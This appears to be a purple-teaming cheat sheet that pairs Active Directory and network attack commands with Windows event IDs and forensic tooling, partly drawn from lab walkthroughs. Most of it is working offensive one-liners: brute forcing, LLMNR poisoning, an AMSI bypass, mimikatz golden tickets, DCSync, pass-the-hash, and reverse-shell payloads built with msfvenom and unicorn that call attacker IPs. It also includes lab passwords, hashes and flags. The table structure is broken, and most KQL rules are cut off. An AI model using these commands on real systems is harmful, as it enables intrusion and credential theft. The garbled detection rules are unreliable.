Purple Teaming
Last updated
Last updated
Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security
| Attack Type | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Type | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Attack Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Stage | Technique | Command | Description |
|---|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Stage | Technique | Command | Description |
|---|---|---|---|
| Event Code | Description | KQL/EQL Rule | Sysmon/Wazuh Rule |
|---|---|---|---|
| Command | Description |
|---|---|
| Stage | Technique | Command | Description |
|---|---|---|---|
| Event Code | Description | KQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Stage | Technique | Command | Description |
|---|---|---|---|
| Event Code | Description | KQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Stage | Technique | Command | Description |
|---|---|---|---|
| Event Code | Description | KQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule |
|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule | Sysmon/Wazuh Rule |
|---|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule | Sysmon/Wazuh Rule |
|---|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule | Sysmon/Wazuh Rule |
|---|---|---|---|
| Command | Description |
|---|---|
| Technique | Command | Description |
|---|---|---|
| Event Code | Description | KQL/EQL Rule | Sysmon/Wazuh Rule |
|---|---|---|---|
| Command | Description |
|---|---|
Enumerating Shares
smbclient -L \\\\TARGET_IP
Lists SMB shares on the target.
Null Session
rpcclient -U "" -N TARGET_IP
Connects to the target with a null session.
Brute Force
crackmapexec smb TARGET_IP -u users.txt -p passwords.txt
Brute-forces SMB credentials.
4624
An account was successfully logged on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5145
A network share object was checked to see whether client can be granted desired access.
`SecurityEvent
log2timeline.py
Extracts timeline from forensic images.
psort.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Sorts events in the plaso file and outputs to CSV.
fls -r -m "/" image.E01 > bodyfile
Generates a body file from an image.
Anonymous Login
ftp TARGET_IP then enter anonymous as user
Attempts anonymous login to FTP server.
Brute Force
hydra -l user -P passlist.txt ftp://TARGET_IP
Brute-forces FTP credentials.
File Upload
ftp TARGET_IP then use put filename
Uploads a file to the FTP server.
4625
An account failed to log on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5156
The Windows Filtering Platform has permitted a connection.
`SecurityEvent
tcpdump -i eth0 port 21 -w ftp_traffic.pcap
Captures FTP traffic on port 21.
plaso -o l2tcsv -f ftp_traffic.pcap -w output.csv
Processes pcap file with Plaso for timeline analysis.
grep -i 'ftp' forensic_image.raw
Searches for FTP-related strings in a forensic image.
LLMNR Poisoning
Responder -I eth0 -wrf
Uses Responder to poison LLMNR requests.
AS-REP Roasting
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes
Extracts AS-REP hashes for users without pre-authentication.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
GenericWrite
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies permissions for a domain object.
Password Spraying
crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success
Attempts to log in with a common password.
RunForrestRun.exe
.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'
Executes RunForrestRun for lateral movement.
Abusing Vulnerable GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
Abusing MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "net localgroup Administrators /add DOMAIN\user"
Executes a command via SQL Server.
Abusing Domain Trusts
Get-DomainTrustMapping -API
Enumerates and abuses domain trusts.
4742
A computer account was changed.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Service Permission
sc.exe sdset SERVICE_NAME DACL_string
Modifies service permissions.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
Abuse ACLs
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies ACLs for domain objects.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse Service
sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"
Creates a malicious service.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Golden Ticket
mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"
Creates a Golden Ticket for domain persistence.
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
4728
A member was added to a security-enabled global group.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Unconstrained Delegation Print Bug
Rubeus.exe monitor /interval:30 /nowrap
Monitors for TGTs if unconstrained delegation is enabled.
Cross Trust
Get-DomainTrust -Domain target_domain
Enumerates trust relationships between domains.
Abuse MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Bypass AMSI
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Disables AMSI in a PowerShell session.
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
DSync Attack
mimikatz.exe "lsadump::dcsync /user:domain\krbtgt"
Extracts credentials from AD using DCSync.
4104
PowerShell script block logging.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Map Scanning
nmap -sC -sV -oA map/result 10.10.10.210
Scans the target for open ports and services.
Gobuster Directory Scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
Enumerates directories on the web server.
Gathering Usernames
Gather usernames manually and create a user.txt file
Collects usernames for further attacks.
Password Spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
Attempts to log in with common passwords.
Sending Phishing Emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
Executes a phishing campaign.
Cracking NTLMv2 Hash
hashcat -m 5600 hash /us/share/wordlists/rockyou.txt -force
Cracks captured NTLMv2 hashes.
PowerShell Remote Session
Soffsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
Establishes a remote PowerShell session.
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Creates a symbolic link to escalate privileges.
Using Check-File Command
Check-File C:\programdata\root\Desktop\root.txt
Checks for the presence of a specific file.
Transferring Files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'
Transfers files using nc.exe.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Nmap Scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
Scans the target for open ports and services.
Web Enumeration with Wappalyzer
Use Wappalyzer to identify backend technologies
Identifies technologies used on the web server.
Analyzing .git Directory
Check the Gemfile in the git directory for Ruby and Gem versions
Analyzes the .git directory for sensitive information.
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
Exploits vulnerabilities in Ruby on Rails.
Capturing Request in Burp
Capture the request and modify it with the exploit
Captures and modifies HTTP requests for exploitation.
Getting a Reverse Shell
Use netcat listener and send the exploit to get a reverse shell
Gains shell access on the target system.
Cracking Password Hashes
Use John the Ripper to crack password hashes found in /var/backups
Cracks password hashes to gain credentials.
Bypassing Two-Factor Authentication
Use the contents of .google_authenticator to bypass two-factor authentication
Bypasses 2FA using the .google_authenticator file.
Synchronizing Time for Exploit
Adjust the system time to match the timezone for the exploit to work
Synchronizes system time for time-based exploits.
Gaining Root Access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
Uses GTFOBins for privilege escalation.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Recon
Nmap Scanning
nmap -sV -sC -oN nmap 10.10.10.237
Scans the target for open ports and services.
Recon
File Analysis
file headv1\\Setup\\1.0.0.exe
Analyzes the executable file for type and content.
Recon
SMB Enumeration
smbclient -L \\\\10.10.10.237
Enumerates SMB shares on the target.
Recon
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
Transfers files via SMB.
Exploitation
Crafting Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "rspoof.exe"
Creates a reverse shell executable.
Exploitation
YML File Creation
Manual creation of latest.yml file
Creates a .yml file for the exploit.
Exploitation
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then put latest.yml
Uploads .yml file via SMB.
Exploitation
Reverse Shell
Use Metasploit to listen for the reverse shell
Listens for an incoming reverse shell connection.
Exploitation
Redis Exploitation
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-alba-4949d52790a0
Exploits Redis to retrieve data.
Exploitation
Password Decryption
python3 decrypt.py with the script provided in the summary
Decrypts a password using a provided script.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Credential Dumping
Enumerating Credentials
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
Enumerates credentials on WSO2.
Credential Dumping
Using Mimikatz
Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key
Dumps credentials using Mimikatz.
Credential Decryption
Decrypting Credentials
dpapi::cred /in: C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey: 40fc84
Decrypts credentials.
Port Forwarding
Setting up Port Forwarding
portfwd add -L 10.10.14.83 -I 10.10.122.15 -l 3389 -p 3389
Sets up port forwarding.
RDP Connection
Connecting via RDP with Remmina
Install Remmina, import sq101.rdp, change host, export to rdp file
Connects via RDP using Remmina.
RDP Connection
Using FreeRDP
xfreerdp sql.rdp /u: epugh_adm /d:rastalabs.local
Connects via RDP using FreeRDP.
4624
An account was successfully logged on.
`SecurityEvent
where EventID == 4624`
4688
A new process has been created.
`SecurityEvent
where EventID == 4688`
5145
A network share object was checked.
`SecurityEvent
where EventID == 5145`
4672
Special privileges assigned to new logon.
`SecurityEvent
where EventID == 4672`
3389
RDP Connection Attempt.
`NetworkTraffic
where DestinationPort == 3389`
tcpdump -i eth0 port 3389 -w rdp_traffic.pcap
Captures RDP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Credential Enumeration
Finding LAPS Group Members
Enumeration to find ngodfrey_adm is part of LAPS group on WS05
Identifies LAPS group members.
Credential Access
Dumping Credentials with PowerSploit
powershell -ep bypass then Import-module /PowerSploit.psd1
Dumps credentials using PowerSploit.
Credential Access
Using Credentials for Access
$SecPassword = ConvertTo-SecureString "J5KCwKruINyCJBKd1dZU" -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential ('rastalabs.local\\ngodfrey_adm', $SecPassword)
Uses dumped credentials for access.
Credential Access
Getting AD Object with Credentials
Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred
Retrieves AD objects using credentials.
Local Admin Passwords
Retrieving Local Admin Passwords
Passwords are listed for WS01, WS02, WSO3, WSO4, WSO5
Retrieves local admin passwords.
Port Forwarding
Setting up Port Forwarding with Meterpreter
portfwd add -L 10.10.14.83 -I 10.10.121.101 -l 447 -p 445 and similar for other ports
Sets up port forwarding using Meterpreter.
Exploitation
Using MS17-010 Exploit
exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080
Exploits MS17-010 for admin shell.
Flag Retrieval
Retrieving Flags
Flags are RASTA{3v3rybOdy_10v35_14p5}, RASTA-wh3¼3_w45_2£4_!?3, RASTA-50m371m35.yOu_mu57_b4ck714ck}
Retrieves flags from WS02 and WS04.
Post-Exploitation
Running Mimikatz
privilege::debug then sekurlsa::logonPasswords
Runs Mimikatz on WS02 to dump credentials.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
7045
A new service was installed.
`SecurityEvent
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Phishing
Creating Phishing HTA
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta
Generates a phishing HTA file.
Web Server Setup
Hosting HTA on Apache2
copy index.html launcher.hta /var/www/html; service apache2 start
Hosts the HTA file on Apache2 server.
Listener Setup
Setting up Metasploit Listener
msfconsole -r unicorn.rc
Sets up a listener in Metasploit.
Share Enumeration
Viewing Shares on Network
net share
Enumerates shared resources on the network.
User Enumeration
Displaying Domain User Accounts
net user /domain
Lists user accounts on the domain.
User Information
Viewing User Info
net user [username] /domain
Displays information about a specific domain user.
Group Enumeration
Viewing Domain Group Members
net group finance /domain
Lists members of a specific domain group.
Drive Enumeration
Listing Logical Drives
fsutil fsinfo drives; wmic logicaldisk get name; diskpart > list volume
Enumerates logical drives on the system.
Network Recon
Pinging Servers for IP Addresses
ping DC01; ping FS01; ...; ping WS05
Pings servers to discover IP addresses.
Flag Retrieval
Accessing the Flag
Flag is XYZ located in M:\\Documents
Retrieves a flag from a specified location.
KeePass Database
Found KeePass Database and Key File
Located KeePass database and key file
Identifies KeePass database and key file.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Credential Use
Using epugh_adm Credentials
Log in to web01 (10.10.110.10) and then RDP to sq101 (10.10.122.15) using epugh_adm creds
Uses credentials to access multiple systems.
Lateral Movement
RDP with gopikrishna
RDP to fs01 with user gopikrishna [local admin]
Uses RDP for lateral movement.
Malware Execution
Running pOwnedshell.exe
Run pOwnedshell.exe with admin cmd
Executes malware with administrative privileges.
Credential Dumping
Invoke Mimikatz from pOwnedshell
Use option 4 in pOwnedshell, invoke Mimikatz to get rweston_da NTLM hash
Dumps credentials using Mimikatz.
Credential Use
Pass-the-Hash with Mimikatz
sekurlsa::pth /user: rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
Uses pass-the-hash technique for authentication.
Golden Ticket Attack
Perform DCSync
Use option 10 in pOwnedshell, perform DCSync
Extracts krbtgt hash for Golden Ticket creation.
Golden Ticket Attack
Generate Golden Ticket
kerberos::golden /domain:rastalabs.local /user: rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a235717938a8bbcebib /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
Creates a Golden Ticket for domain access.
Golden Ticket Attack
Use Golden Ticket
kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
Uses the Golden Ticket for authentication.
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
tcpdump -i eth0 port 3389 -w rdp_traffic.pcap
Captures RDP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Golden Ticket Attack
mimikatz.exe "kerberos::golden /user:Administrator /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /krbtgt:XXXXXX /id:500 /ptt"
Generates a Golden Ticket using Mimikatz.
4768
Kerberos TGT Requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
Silver Ticket Attack
mimikatz.exe "kerberos::golden /user:User /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /target:service.yourdomain.com /service:ServiceType /rc4:XXXXXX /ptt"
Generates a Silver Ticket for a specific service using Mimikatz.
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
Kerberoasting
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
Uses GetUserSPNs.py to request service tickets for service accounts.
Kerberoasting
mimikatz.exe "kerberos::list /export"
Uses Mimikatz to list and export service tickets.
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Pass the Ticket
mimikatz.exe "kerberos::ptt <ticket.kirbi>"
Uses Mimikatz to pass a Kerberos ticket for authentication.
Pass the Ticket
Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'
Uses PowerShell and Mimikatz to pass a Kerberos ticket.
4624
An account was successfully logged on.
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
DCSync
mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:yourdomain.com"
Uses Mimikatz to simulate the behavior of a Domain Controller and request account password data.
4662
An operation was performed on an object
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
AS-REP Roasting
GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt
Uses GetNPUsers.py to request AS-REP for users without pre-authentication.
AS-REP Roasting
Rubeus.exe asreproast
Uses Rubeus to perform AS-REP roasting on the domain.
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4771
Kerberos pre-authentication failed
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
GenericWrite
Set-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights GenericWrite
Uses PowerView to modify the ACL of a domain object, granting GenericWrite rights to an attacker.
GenericWrite
Add-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights All
Adds an ACL entry to a domain object, granting full rights to an attacker.
5136
A directory service object was modified
`SecurityEvent
4662
An operation was performed on an object
`SecurityEvent
4728
A member was added to a security-enabled global group
`SecurityEvent
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Domain Trust Exploitation
Get-DomainTrustMapping -API
Uses PowerView to enumerate domain trusts.
Domain Trust Exploitation
Get-NetDomainTrust -Domain yourdomain.com
Enumerates domain trusts using PowerSploit.
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
SEBackup Privilege Abuse
Get-SeBackupPrivilege -ComputerName target
Uses PowerSploit to exploit SEBackup privilege on a target computer.
SeLoadDriverPrivilege Module
Invoke-SeLoadDriverPrivilege -ComputerName target -DriverPath path_to_driver
Uses a custom module to load a driver using SeLoadDriverPrivilege.
ForceChangePassword Abuse
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user using PowerView.
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4688
A new process has been created
`SecurityEvent
4728
A member was added to a security-enabled global group
`SecurityEvent
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
DLL Sideloading
copy evil.dll C:\Path\To\Legitimate\Application\
Places a malicious DLL in a directory where a legitimate application will load it.
4688
A new process has been created
`SecurityEvent
where EventID == 4688 and NewProcessName contains 'legitimate_application.exe'`
7
Image loaded (Sysmon)
`Sysmon
where EventID == 7 and ImageLoaded contains 'evil.dll'`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and ParentImage contains 'legitimate_application.exe'`
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 dlllist
Lists loaded DLLs in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Process Hollowing
Invoke-ProcessHollowing -SourcePath "C:\Windows\System32\svchost.exe" -TargetPath "C:\Path\To\Malicious.exe"
Uses a PowerShell script to perform process hollowing.
